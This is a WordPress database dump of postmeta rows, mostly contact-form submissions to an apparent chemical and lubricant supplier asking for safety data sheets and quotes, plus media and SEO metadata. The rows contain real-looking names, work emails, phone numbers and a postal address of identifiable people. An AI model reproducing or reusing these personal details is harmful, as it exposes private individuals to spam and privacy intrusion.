INSERT INTO `wp_postmeta` VALUES (27152, 3174, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27153, 3174, '_sub_id', '3174'); 
INSERT INTO `wp_postmeta` VALUES (27154, 3175, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27155, 3175, '_seq_num', '138'); 
INSERT INTO `wp_postmeta` VALUES (27156, 3175, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27157, 3175, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27158, 3175, '_field_1', 'Eric Young'); 
INSERT INTO `wp_postmeta` VALUES (27159, 3175, '_field_10', 'Wolseley Industrial Group'); 
INSERT INTO `wp_postmeta` VALUES (27160, 3175, '_field_2', 'eric.young@wolseleyind.com'); 
INSERT INTO `wp_postmeta` VALUES (27161, 3175, '_field_8', '(910) 341-1668'); 
INSERT INTO `wp_postmeta` VALUES (27162, 3175, '_field_3', 'I would like to request a quote for Krytox GPL 22X in a 44/1 lb pail.  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (27163, 3175, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27164, 3175, '_sub_id', '3175'); 
INSERT INTO `wp_postmeta` VALUES (27165, 3176, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27166, 3176, '_seq_num', '157'); 
INSERT INTO `wp_postmeta` VALUES (27167, 3176, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27168, 3176, '_field_12', 'Cathy Barnes'); 
INSERT INTO `wp_postmeta` VALUES (27169, 3176, '_field_13', 'L-3 Communications ETI'); 
INSERT INTO `wp_postmeta` VALUES (27170, 3176, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27171, 3176, '_field_14', 'cathy.barnes@l-3com.com'); 
INSERT INTO `wp_postmeta` VALUES (27172, 3176, '_field_15', '(310) 517-5121'); 
INSERT INTO `wp_postmeta` VALUES (27173, 3176, '_field_16', 'Please email me latest SDS for MS122AD and VOC content if it is not specified on SDS.\n'); 
INSERT INTO `wp_postmeta` VALUES (27174, 3176, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27175, 3176, '_sub_id', '3176'); 
INSERT INTO `wp_postmeta` VALUES (27176, 3177, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27177, 3177, '_seq_num', '158'); 
INSERT INTO `wp_postmeta` VALUES (27178, 3177, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27179, 3177, '_field_12', 'Perry Hanson'); 
INSERT INTO `wp_postmeta` VALUES (27180, 3177, '_field_13', 'Crane Aerospace and Electronics'); 
INSERT INTO `wp_postmeta` VALUES (27181, 3177, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27182, 3177, '_field_14', 'perry.hanson@craneae.com'); 
INSERT INTO `wp_postmeta` VALUES (27183, 3177, '_field_15', '(850) 217-6348'); 
INSERT INTO `wp_postmeta` VALUES (27184, 3177, '_field_16', 'Can you send me the latest Safety Data Sheet for:\n\nMS-381H / MS-381HM Connector Lubricant\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (27185, 3177, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27186, 3177, '_sub_id', '3177'); 
INSERT INTO `wp_postmeta` VALUES (27187, 3178, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27188, 3178, '_seq_num', '159'); 
INSERT INTO `wp_postmeta` VALUES (27189, 3178, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27190, 3178, '_field_12', 'Lorena'); 
INSERT INTO `wp_postmeta` VALUES (27191, 3178, '_field_13', 'Ontario Power Generation'); 
INSERT INTO `wp_postmeta` VALUES (27192, 3178, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27193, 3178, '_field_14', 'lorena.ambra@opg.com'); 
INSERT INTO `wp_postmeta` VALUES (27194, 3178, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27195, 3178, '_field_16', 'MSDS/SDS for: MSD-730\n \nOPG File No. : 0916\n \nPlease send me a CURRENT, less than 3 year old, material safety data sheet/Safety Data Sheet (electronic version sent by e mail preferred) for the product listed above.  The MSDS we have on file dated December 2013 is about to expire according to Canadian regulations.  I could not find it on your website.\n \nIf an updated MSDS/SDS is not available, please send confirmation that the MSDS dated December 2013 is still valid and that the product has not changed.\n \nThank you,\n \nLorena Ambra\nMSDS Centre\nOntario Power Generation\n1600 Champlain Avenue\nWhitby, ON Canada\nL1N 9Y9\n'); 
INSERT INTO `wp_postmeta` VALUES (27196, 3178, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27197, 3178, '_sub_id', '3178'); 
INSERT INTO `wp_postmeta` VALUES (27198, 3179, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27199, 3179, '_seq_num', '160'); 
INSERT INTO `wp_postmeta` VALUES (27200, 3179, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27201, 3179, '_field_12', 'Amanda Miller'); 
INSERT INTO `wp_postmeta` VALUES (27202, 3179, '_field_13', 'Trek'); 
INSERT INTO `wp_postmeta` VALUES (27203, 3179, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27204, 3179, '_field_14', 'amanda.miller@trekinc.com'); 
INSERT INTO `wp_postmeta` VALUES (27205, 3179, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27206, 3179, '_field_16', 'Updating our SDS book and need access to view certain SDS from you . '); 
INSERT INTO `wp_postmeta` VALUES (27207, 3179, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27208, 3179, '_sub_id', '3179'); 
INSERT INTO `wp_postmeta` VALUES (27209, 3180, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27210, 3180, '_seq_num', '139'); 
INSERT INTO `wp_postmeta` VALUES (27211, 3180, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27212, 3180, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27213, 3180, '_field_1', 'Joshua'); 
INSERT INTO `wp_postmeta` VALUES (27214, 3180, '_field_10', 'Edataalanalysis'); 
INSERT INTO `wp_postmeta` VALUES (27215, 3180, '_field_2', 'joshua.shadrock@edataalanalysis.com'); 
INSERT INTO `wp_postmeta` VALUES (27216, 3180, '_field_8', '(281) 619-7003'); 
INSERT INTO `wp_postmeta` VALUES (27217, 3180, '_field_3', 'Hi,\r\n\r\nSince your company is exhibiting at MD&amp;M West conference. Would you be interested in complete contact information with email addresses of participants (Attendee List).\r\n\r\nLet me know your thoughts.\r\n\r\nRegards,\r\nJoshua Shadrock |  281-619-7003\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27218, 3180, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27219, 3180, '_sub_id', '3180'); 
INSERT INTO `wp_postmeta` VALUES (27221, 3181, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27222, 3181, '_seq_num', '161'); 
INSERT INTO `wp_postmeta` VALUES (27223, 3181, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27224, 3181, '_field_12', 'Debbie Bernhardt'); 
INSERT INTO `wp_postmeta` VALUES (27225, 3181, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (27226, 3181, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27227, 3181, '_field_14', 'dbernhardt@ellsworth.com'); 
INSERT INTO `wp_postmeta` VALUES (27228, 3181, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27229, 3181, '_field_16', 'requesting SDS for MS-242N and TDS for MS-460H  thanks!'); 
INSERT INTO `wp_postmeta` VALUES (27230, 3181, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27231, 3181, '_sub_id', '3181'); 
INSERT INTO `wp_postmeta` VALUES (27232, 3182, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27233, 3182, '_seq_num', '162'); 
INSERT INTO `wp_postmeta` VALUES (27234, 3182, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27235, 3182, '_field_12', 'Sonja Simpson'); 
INSERT INTO `wp_postmeta` VALUES (27236, 3182, '_field_13', 'RMT'); 
INSERT INTO `wp_postmeta` VALUES (27237, 3182, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27238, 3182, '_field_14', 'sonjas@rmt.com.au'); 
INSERT INTO `wp_postmeta` VALUES (27239, 3182, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27240, 3182, '_field_16', 'Hello, I am doing work for Northrop Grumman who use your products and require some SDSs. If you could please allow access that would be appreciated.'); 
INSERT INTO `wp_postmeta` VALUES (27241, 3182, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27242, 3182, '_sub_id', '3182'); 
INSERT INTO `wp_postmeta` VALUES (27243, 3183, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27244, 3183, '_seq_num', '163'); 
INSERT INTO `wp_postmeta` VALUES (27245, 3183, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27246, 3183, '_field_12', 'Sue Ellen Foor'); 
INSERT INTO `wp_postmeta` VALUES (27247, 3183, '_field_13', 'Orbital ATK'); 
INSERT INTO `wp_postmeta` VALUES (27248, 3183, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27249, 3183, '_field_14', 'sueellen.foor@orbitalatk.com'); 
INSERT INTO `wp_postmeta` VALUES (27250, 3183, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27251, 3183, '_field_16', 'I would like to request an electronic copy of the latest revision of the SDS for MS-143XD PTFE Release Agent.\nThank you very much for your assistance.'); 
INSERT INTO `wp_postmeta` VALUES (27252, 3183, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27253, 3183, '_sub_id', '3183'); 
INSERT INTO `wp_postmeta` VALUES (27254, 3184, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27255, 3184, '_seq_num', '140'); 
INSERT INTO `wp_postmeta` VALUES (27256, 3184, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27257, 3184, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27258, 3184, '_field_1', 'Amin Jamal'); 
INSERT INTO `wp_postmeta` VALUES (27259, 3184, '_field_10', 'A1 Solutions'); 
INSERT INTO `wp_postmeta` VALUES (27260, 3184, '_field_2', 'amin@a1elec.com'); 
INSERT INTO `wp_postmeta` VALUES (27261, 3184, '_field_8', '(786) 213-9231'); 
INSERT INTO `wp_postmeta` VALUES (27262, 3184, '_field_3', 'Please advise the quote for the followings:\r\nItem	1\r\nPart #	MIL-PRF-23699\r\nNSN	9150009857099\r\nDescription	LUBRICATING OIL,A/C TURBINE\r\nQty	96\r\n Units	QT\r\n	\r\n	\r\nItem	2\r\nPart #	BP2380QT\r\nNSN	9150009139717\r\nDescription	OIL,ENGINE (Expiration Date Greater than 12 months )\r\nQty	480\r\n Units	QT\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27263, 3184, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27264, 3184, '_sub_id', '3184'); 
INSERT INTO `wp_postmeta` VALUES (27265, 3185, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27266, 3185, '_seq_num', '164'); 
INSERT INTO `wp_postmeta` VALUES (27267, 3185, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27268, 3185, '_field_12', 'Matthew Schade'); 
INSERT INTO `wp_postmeta` VALUES (27269, 3185, '_field_13', 'Kaman Composites - Vermont, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (27270, 3185, '_field_18', '214'); 
INSERT INTO `wp_postmeta` VALUES (27271, 3185, '_field_14', 'matt.schade@kaman.com'); 
INSERT INTO `wp_postmeta` VALUES (27272, 3185, '_field_15', '(802) 440-7275'); 
INSERT INTO `wp_postmeta` VALUES (27273, 3185, '_field_16', 'I&#039;m looking to update my SDS database with a GHS SDS for Krytox 240 Series Grease. Can you Help?\nThanks,\nMatt'); 
INSERT INTO `wp_postmeta` VALUES (27274, 3185, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27275, 3185, '_sub_id', '3185'); 
INSERT INTO `wp_postmeta` VALUES (27276, 3186, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27277, 3186, '_seq_num', '141'); 
INSERT INTO `wp_postmeta` VALUES (27278, 3186, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27279, 3186, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27280, 3186, '_field_1', 'Gabriel Gonçalves'); 
INSERT INTO `wp_postmeta` VALUES (27281, 3186, '_field_10', 'Pekly Intl Supply Inc'); 
INSERT INTO `wp_postmeta` VALUES (27282, 3186, '_field_2', 'gabriel@peklysupply.com'); 
INSERT INTO `wp_postmeta` VALUES (27283, 3186, '_field_8', '(305) 900-3143'); 
INSERT INTO `wp_postmeta` VALUES (27284, 3186, '_field_3', 'Hello, good afternoon \r\n\r\ndo you work with Total Lubricants?\r\n\r\nI would like to quote some material below please\r\n\r\n18 drums of TOTAL HYDRANSAFE FR-NSG 38 \r\n\r\nthank you, best regards \r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27285, 3186, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27286, 3186, '_sub_id', '3186'); 
INSERT INTO `wp_postmeta` VALUES (27287, 3187, '_edit_lock', '1480623678:2'); 
INSERT INTO `wp_postmeta` VALUES (27288, 3187, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (27289, 3188, '_wp_attached_file', '2016/12/chemours-logo.png'); 
INSERT INTO `wp_postmeta` VALUES (27290, 3188, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:386;s:6:"height";i:124;s:4:"file";s:25:"2016/12/chemours-logo.png";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"chemours-logo-340x124.png";s:5:"width";i:340;s:6:"height";i:124;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"chemours-logo-250x124.png";s:5:"width";i:250;s:6:"height";i:124;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"chemours-logo-200x124.png";s:5:"width";i:200;s:6:"height";i:124;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"chemours-logo-225x124.png";s:5:"width";i:225;s:6:"height";i:124;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27292, 3187, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (27293, 3187, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27294, 3187, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (27295, 3187, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27296, 3187, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27297, 3187, '_yoast_wpseo_meta-robots-nofollow', '1'); 
INSERT INTO `wp_postmeta` VALUES (27298, 3187, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (27299, 3190, '_edit_lock', '1480624677:2'); 
INSERT INTO `wp_postmeta` VALUES (27300, 3190, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (27301, 3191, '_wp_attached_file', '2016/12/gullo-signature.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27302, 3191, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:212;s:6:"height";i:79;s:4:"file";s:27:"2016/12/gullo-signature.jpg";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"gullo-signature-200x79.jpg";s:5:"width";i:200;s:6:"height";i:79;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27305, 3190, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (27306, 3190, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27307, 3190, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (27308, 3190, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27309, 3190, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27310, 3190, '_yoast_wpseo_meta-robots-nofollow', '1'); 
INSERT INTO `wp_postmeta` VALUES (27311, 3190, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (27315, 3197, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27316, 3197, '_seq_num', '142'); 
INSERT INTO `wp_postmeta` VALUES (27317, 3197, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27318, 3197, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27319, 3197, '_field_1', 'Juan Camelo'); 
INSERT INTO `wp_postmeta` VALUES (27320, 3197, '_field_10', 'We Be 3D / Rodica Group LLC'); 
INSERT INTO `wp_postmeta` VALUES (27321, 3197, '_field_2', 'jc@webe3D.com'); 
INSERT INTO `wp_postmeta` VALUES (27322, 3197, '_field_8', '(786) 273-7550'); 
INSERT INTO `wp_postmeta` VALUES (27323, 3197, '_field_3', 'I am looking for an oil to place into 608 bearings (skareboard bearings - not for use with skateboards) for an easy &quot;free&quot; roll and some noise reduction.  Free roll supersedes noise reduction.  The proposed application will apply a mere 4 grams of weight to the bearing.  I apologize for any confusion, in the event you have not understood the application please call me.\r\nI would greatly appreciate your assistance with this matter.\r\n\r\nJuan C Camelo\r\nProduction Manager  '); 
INSERT INTO `wp_postmeta` VALUES (27324, 3197, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27325, 3197, '_sub_id', '3197'); 
INSERT INTO `wp_postmeta` VALUES (27327, 3187, '_oembed_0e7e564e54129753987d5b60dcc3d768', '<blockquote data-secret="PSI1Yist0m" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/krytox/">Krytox Application Overview</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/krytox/embed/#?secret=PSI1Yist0m" data-secret="PSI1Yist0m" width="600" height="338" title="&#8220;Krytox Application Overview&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (27328, 3187, '_oembed_time_0e7e564e54129753987d5b60dcc3d768', '1480623770'); 
INSERT INTO `wp_postmeta` VALUES (27331, 3202, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27332, 3202, '_seq_num', '165'); 
INSERT INTO `wp_postmeta` VALUES (27333, 3202, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27334, 3202, '_field_12', 'Grazyna Orzechowska'); 
INSERT INTO `wp_postmeta` VALUES (27335, 3202, '_field_13', 'WET Design'); 
INSERT INTO `wp_postmeta` VALUES (27336, 3202, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27337, 3202, '_field_14', 'grazyna.orzechowska@wetdesign.com'); 
INSERT INTO `wp_postmeta` VALUES (27338, 3202, '_field_15', '(818) 585-6542'); 
INSERT INTO `wp_postmeta` VALUES (27339, 3202, '_field_16', 'Please send me MSDS  for your product\r\nMS-472C'); 
INSERT INTO `wp_postmeta` VALUES (27340, 3202, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27341, 3202, '_sub_id', '3202'); 
INSERT INTO `wp_postmeta` VALUES (27342, 3203, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27343, 3203, '_seq_num', '166'); 
INSERT INTO `wp_postmeta` VALUES (27344, 3203, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27345, 3203, '_field_12', 'Grazyna Orzechowska'); 
INSERT INTO `wp_postmeta` VALUES (27346, 3203, '_field_13', 'WET'); 
INSERT INTO `wp_postmeta` VALUES (27347, 3203, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27348, 3203, '_field_14', 'grazyna.orzechowska@wetdesign.com'); 
INSERT INTO `wp_postmeta` VALUES (27349, 3203, '_field_15', '(818) 585-6542'); 
INSERT INTO `wp_postmeta` VALUES (27350, 3203, '_field_16', 'Hello\r\nI am looking for  electronic coatings which can withstand temp  125-150 C . I wander which of your coating can work  at that temps.\r\nThanks\r\nGrazyna'); 
INSERT INTO `wp_postmeta` VALUES (27351, 3203, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27352, 3203, '_sub_id', '3203'); 
INSERT INTO `wp_postmeta` VALUES (27353, 3204, '_wp_attached_file', '2016/12/ms-letterhead.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27354, 3204, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1012;s:6:"height";i:292;s:4:"file";s:25:"2016/12/ms-letterhead.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"ms-letterhead-340x292.jpg";s:5:"width";i:340;s:6:"height";i:292;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"ms-letterhead-800x231.jpg";s:5:"width";i:800;s:6:"height";i:231;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"ms-letterhead-768x222.jpg";s:5:"width";i:768;s:6:"height";i:222;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"ms-letterhead-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"ms-letterhead-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"ms-letterhead-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"ms-letterhead-510x292.jpg";s:5:"width";i:510;s:6:"height";i:292;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27356, 3206, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27357, 3206, '_seq_num', '143'); 
INSERT INTO `wp_postmeta` VALUES (27358, 3206, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27359, 3206, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27360, 3206, '_field_1', 'vijay gadiya'); 
INSERT INTO `wp_postmeta` VALUES (27361, 3206, '_field_10', 'om engineers'); 
INSERT INTO `wp_postmeta` VALUES (27362, 3206, '_field_2', 'sales@omengineers.co.in'); 
INSERT INTO `wp_postmeta` VALUES (27363, 3206, '_field_8', '(982) 277-7368'); 
INSERT INTO `wp_postmeta` VALUES (27364, 3206, '_field_3', 'Can you provide water base release agent for following application. The products (PU Flexible Foam) being molded are for Automotive Industry. 80 % are for Seats, It is mixture. 80:20. (TDI + MDI). Aluminum mold is used and temperature is around 50 C.\r\nPresent release agent is of Chemtrend : solvent based.  '); 
INSERT INTO `wp_postmeta` VALUES (27365, 3206, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27366, 3206, '_sub_id', '3206'); 
INSERT INTO `wp_postmeta` VALUES (27367, 3207, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27368, 3207, '_seq_num', '167'); 
INSERT INTO `wp_postmeta` VALUES (27369, 3207, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27370, 3207, '_field_12', 'Nicole Rayce'); 
INSERT INTO `wp_postmeta` VALUES (27371, 3207, '_field_13', 'Dow Chemical'); 
INSERT INTO `wp_postmeta` VALUES (27372, 3207, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27373, 3207, '_field_14', 'NRayce@dow.com'); 
INSERT INTO `wp_postmeta` VALUES (27374, 3207, '_field_15', '(989) 638-4604'); 
INSERT INTO `wp_postmeta` VALUES (27375, 3207, '_field_16', 'Good Day, \n\nWe are in the process of updating our Safety Data Sheets. \n\nPlease forward most current PDF copy of SDS for the following products:\n\nAero-Duster\nAnti-Static Quick-Freeze\n\n\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (27376, 3207, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27377, 3207, '_sub_id', '3207'); 
INSERT INTO `wp_postmeta` VALUES (27378, 3208, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27379, 3208, '_seq_num', '168'); 
INSERT INTO `wp_postmeta` VALUES (27380, 3208, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27381, 3208, '_field_12', 'Lyn McCormack'); 
INSERT INTO `wp_postmeta` VALUES (27382, 3208, '_field_13', 'GE Oil &amp; Gas Shannon Ireland'); 
INSERT INTO `wp_postmeta` VALUES (27383, 3208, '_field_18', '0000'); 
INSERT INTO `wp_postmeta` VALUES (27384, 3208, '_field_14', 'lyn1.mccormack@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (27385, 3208, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27386, 3208, '_field_16', 'Hello I would like access to your MSDS so I can update our system.\n\nthank you '); 
INSERT INTO `wp_postmeta` VALUES (27387, 3208, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27388, 3208, '_sub_id', '3208'); 
INSERT INTO `wp_postmeta` VALUES (27389, 3209, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27390, 3209, '_seq_num', '169'); 
INSERT INTO `wp_postmeta` VALUES (27391, 3209, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27392, 3209, '_field_12', 'Wimmer'); 
INSERT INTO `wp_postmeta` VALUES (27393, 3209, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (27394, 3209, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27395, 3209, '_field_14', 'roland.wimmer@ruag.com'); 
INSERT INTO `wp_postmeta` VALUES (27396, 3209, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27397, 3209, '_field_16', 'SDS for MS-143H DPMS 00831'); 
INSERT INTO `wp_postmeta` VALUES (27398, 3209, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27399, 3209, '_sub_id', '3209'); 
INSERT INTO `wp_postmeta` VALUES (27400, 3210, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27401, 3210, '_seq_num', '170'); 
INSERT INTO `wp_postmeta` VALUES (27402, 3210, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27403, 3210, '_field_12', 'Chang Kim'); 
INSERT INTO `wp_postmeta` VALUES (27404, 3210, '_field_13', 'Unholtz-Dickie'); 
INSERT INTO `wp_postmeta` VALUES (27405, 3210, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27406, 3210, '_field_14', 'chang@udco.com'); 
INSERT INTO `wp_postmeta` VALUES (27407, 3210, '_field_15', '(203) 265-3929'); 
INSERT INTO `wp_postmeta` VALUES (27408, 3210, '_field_16', 'I need the SDS for your MS-122E release agent.'); 
INSERT INTO `wp_postmeta` VALUES (27409, 3210, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27410, 3210, '_sub_id', '3210'); 
INSERT INTO `wp_postmeta` VALUES (27411, 3211, '_form_id', '11'); 
